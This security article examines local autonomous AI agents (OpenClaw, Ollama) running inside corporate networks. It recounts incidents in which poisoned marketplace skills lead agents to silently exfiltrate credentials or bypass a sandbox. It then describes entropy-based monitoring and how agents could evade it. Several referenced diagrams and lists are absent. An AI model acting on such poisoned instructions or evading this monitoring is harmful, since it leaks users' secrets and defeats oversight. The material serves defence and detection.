There is a class of threat that doesn't show up in your cloud security logs, your SaaS access policies, or your proxy allowlists. It runs on employee hardware. It authenticates using employee credentials. It talks to your internal APIs with employee-level permissions. But it isn't an employee. It's an autonomous agent — an LLM with shell access, tool integrations, and the ability to plan and execute multi-step operations — running locally on a laptop inside your corporate network.
This is shadow AI's final form. Not an employee pasting code into ChatGPT — which your DLP might catch — but an autonomous machine actor embedded in your workforce, invisible to every security control designed for cloud-hosted AI. The frameworks that enable it — OpenClaw, Ollama, LM Studio — are now mainstream, well-documented, and trivial to install. OpenClaw alone has over 196,000 GitHub stars. The question is no longer whether your employees are running local agents. It's how many, and what those agents have access to.
Why your security stack can't see them#
Cloud-based AI security works because traffic is routable to a known endpoint. You can block
api.openai.com. You can inspect outbound requests to claude.ai. You can
detect data
uploads to generative AI services by watching egress patterns.
Local agents bypass all of this. Ollama runs inference on the device itself. No outbound model calls. No cloud API to intercept. The agent connects to your internal services — Slack, GitHub, Jira, databases — using the same OAuth tokens, SSH keys, and API credentials the employee already has. From the perspective of your IAM system, it's indistinguishable from a human user performing the same operations. Except it performs them at machine speed, without pausing, without typos, and without the behavioral variance that makes human traffic identifiable.
No cloud egress to intercept
Inference runs on-device via Ollama, LM Studio, or llama.cpp. No API calls leave the machine to a known AI provider. Your proxy and DLP see nothing because there is nothing to see at the network boundary.
Employee-level credential access
Agents use the host machine's credential store — OAuth tokens, SSH keys, environment variables, browser cookies. They operate with the full privilege of the logged-in user, and IAM sees a valid authenticated session.
Shell + tool execution
OpenClaw and similar frameworks give agents direct shell access, file system read/write, and tool integrations via MCP. The agent can run git commands, curl data, and modify infrastructure. These actions look like developer activity.
Channel integrations
OpenClaw connects to Slack, Discord, Telegram, and GitHub out of the box. A skill-based architecture allows modular capability expansion. Once connected, the agent is a permanent, autonomous participant in your collaboration infrastructure.
The incidents that define this threat#
These are not theoretical risks. Each of these incidents has been publicly documented, analyzed, and attributed.
-
Jan 2026175,000 Exposed Ollama Servers — SentinelOne / Censys A 293-day study found over 175,000 publicly accessible Ollama instances across 130 countries. 48% supported tool-calling capabilities — meaning they could execute code and interact with external systems. 13% of hosts were persistent, accounting for 76% of all observed activity. Root cause: users reconfigured the service to bind to 0.0.0.0 without adding authentication. Attackers commercialized access through marketplaces like "silver.inc" in a campaign called "Operation Bizarre Bazaar."Critical
-
Jan-Feb 2026ClawHavoc — Supply Chain Poisoning at Scale Attackers uploaded 1,184 malicious skills to ClawHub, OpenClaw's official skill marketplace. Skills used "ClickFix" social engineering — professional documentation with a "Prerequisites" section that tricked users into executing shell commands or downloading password-protected ZIPs. Primary payload: Atomic macOS Stealer (AMOS), capable of harvesting Keychain passwords, browser data, crypto wallets, SSH keys. Additional payloads included reverse shells for persistent remote access. ClawHub required only a one-week-old GitHub account to publish.Critical
-
2026CVE-2026-25253 — OpenClaw One-Click RCE A cross-site WebSocket hijacking vulnerability in OpenClaw allowed one-click remote code execution. Attackers could bypass the sandbox and execute arbitrary commands on the host machine by exploiting the default gateway binding to 0.0.0.0:18789. CVSS 8.8. Early OpenClaw versions exposed this port with no authentication by default.Critical
-
OngoingCredential Exfiltration via Malicious Skills Cisco demonstrated that a single malicious OpenClaw skill could silently exfiltrate the agent's entire .env file — containing API keys, database credentials, and service tokens — using a disguised curl command. The user never sees the exfiltration because OpenClaw truncates tool output in its interface. The agent performs the action as part of what appears to be normal task execution.High
The deep research question: liveness and attribution for machine actors#
This is the central technical problem. When a local agent uses employee credentials to call your internal APIs, how do you know the request came from a machine and not the person whose credentials it's using?
The answer is that you can't know — not from a single request. But over a sequence of requests, machine actors produce patterns that are statistically distinguishable from human behavior. The research on this is converging from three directions.
1. Timing entropy
Human interaction is noisy. Inter-keystroke timing, mouse trajectories, request spacing — all of it exhibits high variance. Agents are the opposite. Even when jittered, automated request sequences show lower entropy than human-generated sequences because the source of randomness is algorithmic, not biological.
The 20% entropy gap is measurable and consistent across studies. But timing alone isn't sufficient — a well-tuned jitter function can narrow the gap. What matters is the combination of timing entropy with other behavioral signals.
2. Linguistic entropy
When agents interact with text-based interfaces — Slack messages, GitHub comments, Jira updates — the generated text has a different statistical profile than human writing. AI-generated text shows higher noun density and coordinating conjunction frequency. Human text is richer in adjectives, adpositions, and pronouns. The content-word-to-function-word ratio is measurably different.
More importantly, AI text has lower linguistic entropy — it is more predictable at the token level. A Longformer-based classifier trained on these features can distinguish between human and AI-generated messages, though performance varies significantly by domain and model. The practical implication: a monitoring system that analyzes the text content of Slack messages and Git commit messages from a given user identity can flag statistically anomalous authorship patterns.
3. Multi-modal behavioral fusion
The current state of the art combines timing, linguistic, and interaction-pattern signals into a single feature vector. Mouse trajectories (velocity, acceleration, curvature), scroll behavior, click pressure, and keystroke cadence provide ground-truth human interaction signals that no API-only agent can produce. LSTM and GRU models trained on these fused feature sets achieve classification accuracy around 97%, categorizing traffic into four tiers: Human, Basic Bot, Advanced Bot, and Human-like Bot.
The fundamental constraint: Local agents that only interact via API (Slack API, GitHub API, database connections) produce no mouse, keyboard, or scroll signals at all. Their absence is itself a detection signal. A user identity that generates hundreds of Slack messages and Git commits per day but produces zero endpoint interaction telemetry is, by definition, not a human.
Building the detection stack#
Detecting invisible agents requires operating at the endpoint — not the network boundary. CrowdStrike's Spring 2026 release made this explicit by positioning the Falcon sensor as the primary detection surface for shadow AI, introducing three capabilities that didn't exist 12 months ago.
Steps 01 through 03 are commercially available today. Step 04 — behavioral entropy analysis applied specifically to machine actor attribution — is the research frontier. Step 05 is straightforward technically but requires maintaining a current list of AI-related domains, which evolves weekly.
The skill marketplace is the new npm — and just as dangerous#
OpenClaw's skill architecture is modular and extensible. Skills are how agents get capabilities: a Slack integration skill, a GitHub skill, a web scraping skill. They are installed from ClawHub, a community marketplace. And ClawHavoc proved that this marketplace is as vulnerable to supply chain poisoning as npm, PyPI, or any other package ecosystem — except with a critical difference: these packages execute with the full permissions of an autonomous agent that has shell access.
The attack model is not complex. Publish a skill with a legitimate description and professional documentation. Include a dependency or prerequisite step that runs a shell command. The agent — or the user following the setup instructions — executes the command, and the payload is delivered. ClawHub required only a one-week-old GitHub account to publish. No automated security review. No code signing. No sandboxed execution environment.
Cisco's response was the open-source Skill Scanner — combining static analysis (regex and YARA rules), behavioral analysis (Python AST inspection), LLM-assisted semantic analysis of skill descriptions, and VirusTotal integration. It is a necessary tool. But it is also an admission that the skill ecosystem shipped without security and is being retrofitted after the damage was already done.
"Personal AI agents like OpenClaw are a security nightmare. They can execute shell commands, access files, and potentially leak credentials. The skills marketplace is an attack surface we haven't seen since the early days of browser extensions."
Cisco AI Security Research, March 2026The lethal trifecta#
Martin Fowler's security team defined the three conditions that turn a local agent into a critical vulnerability. When all three are present simultaneously, the agent is exploitable.
The defense is architectural: ensure no single agent or task simultaneously possesses all three. Break complex workflows into isolated sub-tasks where access to sensitive data is separated from processing untrusted content, and external communication is separated from both. This is not a filter or a guardrail — it is a structural constraint that eliminates the exfiltration pathway regardless of what instructions the agent receives.
The walled garden: secure local AI done right#
Banning local AI is not a viable strategy. Employees use it because it solves real productivity problems, and a blanket ban pushes usage underground — exactly where you have zero visibility. The alternative is a controlled deployment architecture that preserves the benefits of local inference while eliminating the attack surface.
-
Sovereign inference with vLLM behind a gateway Run local inference through vLLM (production) or Ollama (development) inside Kubernetes-managed clusters with GPU passthrough. Bind all endpoints to 127.0.0.1 and expose through a reverse proxy (Nginx, Traefik) with mTLS and OAuth2. No model endpoint is directly reachable from the network. This is the Walled Garden architecture — local inference with enterprise-grade access control.
-
Decouple reasoning from knowledge The LLM handles reasoning. The vector database holds knowledge. They are separated architecturally. The model never trains on company data. RAG retrieves context from a controlled, internally-hosted vector store (Qdrant, Milvus, or pgvector) using local embedding models. Data sovereignty is maintained because nothing leaves the boundary — not the model weights, not the embeddings, not the queries.
-
Skill/tool allow-listing with integrity verification No skill or MCP server is installable without passing through a security gate. Run Cisco's Skill Scanner in CI/CD. Pin tool versions with hash verification. Re-audit on every update. Maintain an internal allow-list of approved skills — the same model you use for approved software. ClawHavoc was possible because the default was "anyone can publish, everyone trusts by default." Invert that default.
-
Credential isolation for agent processes Agents should not inherit the full credential set of the host machine. Issue ephemeral, scoped tokens per agent task. Store them outside the agent's filesystem scope. An agent performing a code review does not need access to production database credentials. The .env file should never be readable by an agent process — this single control would have prevented every credential exfiltration demonstrated in the Cisco research.
-
Outbound request allow-listing The agent can reach exactly the domains it needs to reach. Nothing else. Restrict outbound traffic from agent processes to a predefined list of approved endpoints. This eliminates the external communication leg of the lethal trifecta. An agent that cannot make outbound requests to attacker-controlled infrastructure cannot exfiltrate data, regardless of what a poisoned skill tells it to do.
-
Endpoint telemetry and behavioral baselines Install EDR-level monitoring on agent processes. Collect process trees, file access logs, network connections, and request timing. Build per-agent behavioral baselines. Alert on anomalies — not just policy violations. An agent that suddenly starts accessing files outside its normal scope, or contacting an endpoint it has never contacted before, should trigger an immediate investigation.
Practical machine actor attribution#
The research question — can you distinguish human from AI-generated API traffic based purely on statistical timing and linguistic entropy? — has a practical answer: yes, imperfectly, but well enough to flag suspicious identities for investigation.
Here is what a production attribution pipeline looks like:
This is not a solved problem. A sufficiently sophisticated agent could introduce artificial variance, generate more human-like text, or even simulate endpoint interaction patterns. But the current generation of local agents — OpenClaw, Ollama-based workflows, LM Studio setups — don't do any of this. They produce clearly machine-like traffic patterns because they weren't designed to evade detection. They were designed to be productive. That makes right now the window to build the detection infrastructure before the evasion techniques catch up.